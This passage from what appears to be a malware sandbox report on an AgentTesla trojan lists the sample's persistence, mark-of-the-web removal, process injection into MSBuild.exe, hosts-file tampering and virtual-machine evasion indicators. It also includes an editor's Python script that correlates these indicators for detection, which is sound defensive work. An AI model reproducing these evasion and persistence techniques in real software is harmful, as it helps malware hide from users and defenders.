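# distribution mimics an encrypted .text section; a run of NOPs mimics plain code.
UNIFORM_TEXT = bytes(range(256)) * 64
PLAIN_TEXT = b"\x90" * 1024

if __name__ == "__main__":
    print(triage(build_minimal_pe_header(REPORT_TIMESTAMP), UNIFORM_TEXT))
```

On a real file, pass the first few hundred bytes of the image to `coff_timestamp` and the raw bytes of the `.text` section (from the section table) to `shannon_entropy`; the report's 7.98 for this sample sits well above the threshold, which is consistent with the packed payload that the Yara rules only match after unpacking.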
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe:Zone.Identifier read attributes | delete
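Taken together, the MSBuild.exe events recorded in this report and in the Data Obfuscation section above (a copy of itself written to `%APPDATA%\ykVBUY\ykVBUY.exe`, a `ykVBUY` value written under `HKCU\...\CurrentVersion\Run`, and the dropped file's `Zone.Identifier` stream opened with delete access so the copy no longer carries the mark of the web) are the usual drop, persist and strip-MOTW sequence, performed here by a build tool that has no business doing any of it. The Python below is an editor's example added to this report, not Joe Sandbox or sample code: it correlates those three behaviours over a minimal event list. The `process`/`action`/`target` schema and the `EVENTS` records are constructed from the report's lines, not a sandbox export; matching the Run value's name to the dropped file's stem is a heuristic, because the report does not show the value's data (a real export would let you match on the command line instead).

```python
"""Correlate drop -> Run-key persistence -> Zone.Identifier removal by one
process.  Editor's example for this report; the event schema and the EVENTS
list are constructed from the report's lines, not a sandbox export.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Event:
    process: str   # image path of the acting process
    action: str    # file_created | registry_value_set | file_opened_delete
    target: str    # file path, registry value path, or file:stream


MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"

# Constructed from the report's three Source lines (one record each).
EVENTS: List[Event] = [
    Event(MSBUILD, "file_created", DROPPED),
    Event(MSBUILD, "registry_value_set",
          r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ykVBUY"),
    Event(MSBUILD, "file_opened_delete", DROPPED + ":Zone.Identifier"),
]

RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"   # lower-cased
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\")
# Build/utility hosts that have no business writing Run keys (editor's list).
BUILD_TOOLS = {"msbuild.exe"}


def split_ads(path: str) -> Tuple[str, str]:
    """'C:\\dir\\f.exe:Zone.Identifier' -> ('C:\\dir\\f.exe', 'Zone.Identifier');
    the drive-letter colon at index 1 is skipped."""
    idx = path.find(":", 2)
    return (path, "") if idx < 0 else (path[:idx], path[idx + 1:])


def correlate(events: List[Event]) -> List[Dict[str, object]]:
    """One finding per file dropped into a user-writable directory, scored by
    how many of the three behaviours the same event stream shows for it."""
    dropped: Dict[str, Event] = {}       # lower-cased path -> file_created event
    run_values: Dict[str, Event] = {}    # lower-cased value name -> registry event
    motw_removed: Dict[str, Event] = {}  # lower-cased base path -> ADS delete event

    for ev in events:
        t = ev.target.lower()
        if ev.action == "file_created" and any(d in t for d in USER_WRITABLE):
            dropped[t] = ev
        elif ev.action == "registry_value_set" and RUN_KEY in t:
            run_values[t.rsplit("\\", 1)[1]] = ev
        elif ev.action == "file_opened_delete":
            base, stream = split_ads(ev.target)
            if stream.lower() == "zone.identifier":
                motw_removed[base.lower()] = ev

    findings: List[Dict[str, object]] = []
    for path, ev in dropped.items():
        stem = path.rsplit("\\", 1)[1].rsplit(".", 1)[0]
        run_ev: Optional[Event] = run_values.get(stem)   # heuristic: value name == file stem
        is_build_tool = ev.process.lower().rsplit("\\", 1)[-1] in BUILD_TOOLS
        motw = path in motw_removed
        findings.append({
            "dropped_file": ev.target,
            "writer": ev.process,
            "run_key_value": run_ev.target if run_ev else None,
            "motw_removed": motw,
            "writer_is_build_tool": is_build_tool,
            "score": int(run_ev is not None) + int(motw) + int(is_build_tool),
        })
    return findings


if __name__ == "__main__":
    for finding in correlate(EVENTS):
        print(finding)
```

A score of 3 is what this sample produces; a lone drop into `%APPDATA%` scores 1 and is routine for installers, which is why the three signals are combined rather than alerted on individually. On a live host the same logic maps onto Sysmon event IDs 11 (file create), 13 (registry value set) and 23/26 (file delete), with the `:Zone.Identifier` suffix visible in the target filename.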
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe TID: 6264 | Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe TID: 6280 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3216 | Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3380 | Thread sleep count: 6084 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3380 | Thread sleep count: 2290 > 30
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe TID: 3104 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe TID: 6304 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 6084
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 2290
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Thread delayed: delay time: 45733
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Thread delayed: delay time: 922337203685477
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                    Source: MSBuild.exe, 00000009.00000002.527123484.00000000012EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnito
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067FC640 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 436000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 464000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D86008
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/NativeMethodsShared.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/E1.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/E1.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/E1.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.2.unpack, A/E1.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.2.MSBuild.exe.400000.0.unpack, A/E1.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.0.unpack, A/E1.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File written: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: MSBuild.exe, 00000009.00000002.529853749.0000000003202000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: MSBuild.exe, 00000009.00000002.529853749.0000000003202000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: program manager
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
